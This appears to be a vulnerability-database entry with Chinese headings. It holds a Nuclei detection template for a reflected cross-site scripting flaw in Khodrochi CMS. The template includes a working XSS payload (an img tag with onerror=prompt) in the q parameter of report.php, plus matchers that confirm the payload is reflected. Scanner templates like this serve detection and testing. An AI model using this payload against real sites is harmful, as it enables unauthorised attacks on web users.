漏洞描述
A cross site scripting vulnerability was found in the Khodrochi.ir CMS an Iranian Car Services Platform.
khodrochi-cms-xss: Khodrochi CMS - Cross Site Scripting
PoC代码[已公开]
id: khodrochi-cms-xss
info:
name: Khodrochi CMS - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
A cross site scripting vulnerability was found in the Khodrochi.ir CMS an Iranian Car Services Platform.
reference:
- https://www.exploitalert.com/view-details.html?id=38723
- https://cxsecurity.com/ascii/WLB-2022050087
metadata:
verified: true
max-request: 1
tags: khodrochi,cms,xss,vuln
http:
- method: GET
path:
- "{{BaseURL}}/specification/report.php?q=%22%3E%3Cimg%20src=x%20onerror=prompt(document.domain)%3E"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(header, "text/html")'
- 'contains(body, "class=\"cons_form") && contains(body, "><img src=x onerror=prompt(document.domain)>")'
condition: and
# digest: 4a0a00473045022060032f9b084a93fc9642d7fc3c25bbc069202cd95952073a8fb4d3bb847ad6d8022100a92ba11c61034e35947eca3a80eed2d567afa87e8ebd1cad5d94e8d358cda233:922c64590222798bb761d5b6d8e72950